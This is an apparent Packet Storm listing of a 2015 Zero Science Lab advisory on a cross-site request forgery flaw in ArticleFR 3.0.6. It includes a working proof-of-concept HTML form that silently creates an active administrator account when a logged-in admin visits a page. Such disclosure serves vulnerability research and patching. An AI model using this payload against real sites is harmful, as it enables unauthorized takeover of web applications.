ArticleFR 3.0.6 Cross Site Request Forgery

2015-07-14T00:00:00
ID PACKETSTORM:132684
Type packetstorm
Reporter LiquidWorm
Modified 2015-07-14T00:00:00

Description

                                        
                                            `  
ArticleFR 3.0.6 CSRF Add Admin Exploit  
  
  
Vendor: Free Reprintables  
Product web page: http://www.freereprintables.com  
Affected version: 3.0.6  
  
Summary: A lightweight fully featured content (article / video)  
management system. Comes with a pluginable and multiple module  
framework system.  
  
Desc: The application allows users to perform certain actions  
via HTTP requests without performing any validity checks to  
verify the requests. This can be exploited to perform certain  
actions with administrative privileges if a logged-in user  
visits a malicious web site.  
  
Tested on: nginx/1.6.2  
PHP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5248  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php  
  
  
21.06.2015  
  
--  
  
  
<html>  
<body>  
<form action="http://127.0.0.1/dashboard/users/create/" method="POST">  
<input type="hidden" name="username" value="thricer" />  
<input type="hidden" name="name" value="The_Hacker" />  
<input type="hidden" name="password" value="s3cr3t" />  
<input type="hidden" name="email" value="lab@zeroscience.mk" />  
<input type="hidden" name="website" value="http://www.zeroscience.mk" />  
<input type="hidden" name="blog" value="zsl" />  
<input type="hidden" name="membership" value="admin" />  
<input type="hidden" name="isactive" value="active" />  
<input type="hidden" name="submit" value="Create" />  
<input type="submit" value="Request" />  
</form>  
</body>  
</html>  
`